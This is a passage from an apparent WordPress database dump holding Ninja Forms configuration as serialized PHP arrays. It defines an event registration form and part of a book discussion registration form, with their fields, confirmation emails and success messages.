Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"None\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:22:\"Any food requirements?\";s:9:\"field_key\";s:21:\"any_food_requirements\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:438;}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:2:\"10\";s:5:\"label\";s:16:\"Preferred drink?\";s:3:\"key\";s:15:\"preferred_drink\";s:4:\"type\";s:9:\"listradio\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"White wine\";s:5:\"value\";s:10:\"white-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Red wine\";s:5:\"value\";s:8:\"red-wine\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Beer\";s:5:\"value\";s:4:\"beer\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:13:\"No Preference\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:16:\"Preferred drink?\";s:9:\"field_key\";s:15:\"preferred_drink\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:439;}i:10;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:2:\"11\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_2\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_2\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:440;}i:11;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:2:\"12\";s:5:\"label\";s:4:\"HTML\";s:3:\"key\";s:4:\"html\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:480:\"<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:4:\"html\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:441;}i:12;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:2:\"13\";s:5:\"label\";s:8:\"Register\";s:3:\"key\";s:8:\"register\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:442;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";}s:2:\"id\";i:187;}i:1;a:2:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:23:\"User Email Confirmation\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:13:\"email_message\";s:72:\"<p>Your registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:188;}i:2;a:2:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:24:\"Admin Email Notification\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:67:\"<p>Registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:189;}i:3;a:2:{s:8:\"settings\";a:33:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:15:\"Success Message\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:47:\"<p>Thank you for registering for our event.</p>\";s:9:\"parent_id\";s:2:\"47\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";}s:2:\"id\";i:190;}}s:8:\"settings\";a:22:{s:5:\"title\";s:18:\"Event Registration\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:7:\"seq_num\";N;s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:13:{i:0;s:23:\"event_intro_description\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:37:\"how_many_friends_will_you_bring_along\";i:8;s:21:\"any_food_requirements\";i:9;s:15:\"preferred_drink\";i:10;s:4:\"hr_2\";i:11;s:4:\"html\";i:12;s:8:\"register\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";}}',4,0x00),(48,'a:7:{s:2:\"id\";i:48;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:7:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:63:\"Book Discussion Registration -Autobiography of a Modern Prophet\";s:3:\"key\";s:77:\"book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:336:\"<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:40:\"ECK Light and Sound Service Registration\";s:9:\"field_key\";s:54:\"eck_light_and_sound_service_registration_1620150522553\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:443;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:445;}i:2;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:446;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:447;}i:4;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:448;}i:5;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:3:\"key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:5:\"label\";s:0:\"\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:158:\"<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:0:\"\";s:9:\"field_key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";}s:2:\"id\";i:444;}i:6;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:20:\"submit_1618628929218\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1618628929218\";}s:2:\"id\";i:449;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-19 08:12:04\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:234:\"<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for this book discussion!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login 